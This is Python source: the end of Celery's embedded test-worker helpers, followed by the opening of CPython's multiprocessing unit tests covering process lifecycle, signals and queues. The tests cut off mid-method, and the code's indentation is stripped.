def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
self._on_started = threading.Event()
super(TestWorkController, self).__init__(*args, **kwargs)
def on_consumer_ready(self, consumer):
# type: (celery.worker.consumer.Consumer) -> None
"""Callback called when the Consumer blueprint is fully started."""
self._on_started.set()
test_worker_started.send(
sender=self.app, worker=self, consumer=consumer)
def ensure_started(self):
# type: () -> None
"""Wait for worker to be fully up and running.
Warning:
Worker must be started within a thread for this to work,
or it will block forever.
"""
self._on_started.wait()
@contextmanager
def start_worker(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
perform_ping_check=True,
ping_task_timeout=10.0,
**kwargs):
# type: (Celery, int, str, Union[str, int],
# str, bool, float, **Any) -> # Iterable
"""Start embedded worker.
Yields:
celery.app.worker.Worker: worker instance.
"""
test_worker_starting.send(sender=app)
with _start_worker_thread(app,
concurrency=concurrency,
pool=pool,
loglevel=loglevel,
logfile=logfile,
**kwargs) as worker:
if perform_ping_check:
from .tasks import ping
with allow_join_result():
assert ping.delay().get(timeout=ping_task_timeout) == 'pong'
yield worker
test_worker_stopped.send(sender=app, worker=worker)
@contextmanager
def _start_worker_thread(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
WorkController=TestWorkController,
**kwargs):
# type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
"""Start Celery worker in a thread.
Yields:
celery.worker.Worker: worker instance.
"""
setup_app_for_worker(app, loglevel, logfile)
assert 'celery.ping' in app.tasks
# Make sure we can connect to the broker
with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn:
conn.default_channel.queue_declare
worker = WorkController(
app=app,
concurrency=concurrency,
hostname=anon_nodename(),
pool=pool,
loglevel=loglevel,
logfile=logfile,
# not allowed to override TestWorkController.on_consumer_ready
ready_callback=None,
without_heartbeat=True,
without_mingle=True,
without_gossip=True,
**kwargs)
t = threading.Thread(target=worker.start)
t.start()
worker.ensure_started()
_set_task_join_will_block(False)
yield worker
from celery.worker import state
state.should_terminate = 0
t.join(10)
state.should_terminate = None
@contextmanager
def _start_worker_process(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
**kwargs):
# type (Celery, int, str, Union[int, str], str, **Any) -> Iterable
"""Start worker in separate process.
Yields:
celery.app.worker.Worker: worker instance.
"""
from celery.apps.multi import Cluster, Node
app.set_current()
cluster = Cluster([Node('testworker1@%h')])
cluster.start()
yield
cluster.stopwait()
def setup_app_for_worker(app, loglevel, logfile):
# type: (Celery, Union[str, int], str) -> None
"""Setup the app to be used for starting an embedded worker."""
app.finalize()
app.set_current()
app.set_default()
type(app.log)._setup = False
app.log.setup(loglevel=loglevel, logfile=logfile)
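# --- Usage sketch (added for illustration; not part of the original module) ---
# Typical use from an integration test: wrap a configured Celery app with the
# embedded worker and dispatch tasks inside the block. The broker/backend URLs
# and the task below are placeholders:
#
#   from celery import Celery
#   from celery.contrib.testing import tasks  # noqa: registers the shared 'celery.ping' task
#   app = Celery('tests', broker='memory://', backend='cache+memory://')
#
#   @app.task
#   def add(x, y):
#       return x + y
#
#   with start_worker(app, perform_ping_check=False) as w:
#       assert add.delay(2, 2).get(timeout=10) == 4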
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
    def _test_wait_for_threads(cls, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
    def _test_error_on_stdio_flush(cls, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
    def _sleep_and_set_event(cls, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # This test only makes sense for the forkserver start method,
            # since it exercises restarting the forkserver process.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
        # give the forkserver time to die and proc time to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
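# _UpperCaser is a Process subclass used by _TestSubclassingProcess below:
# the parent submits strings over a Pipe and the child sends back the
# upper-cased result; stop() sends None so the child's recv loop finishes.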
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
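# Helpers that duck-type across the queue implementations used in these
# tests: some of them may not provide empty()/full(), in which case we fall
# back to comparing qsize() against the expected bound.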
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
        # the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
        # pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
                # relies on sem_getvalue()
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
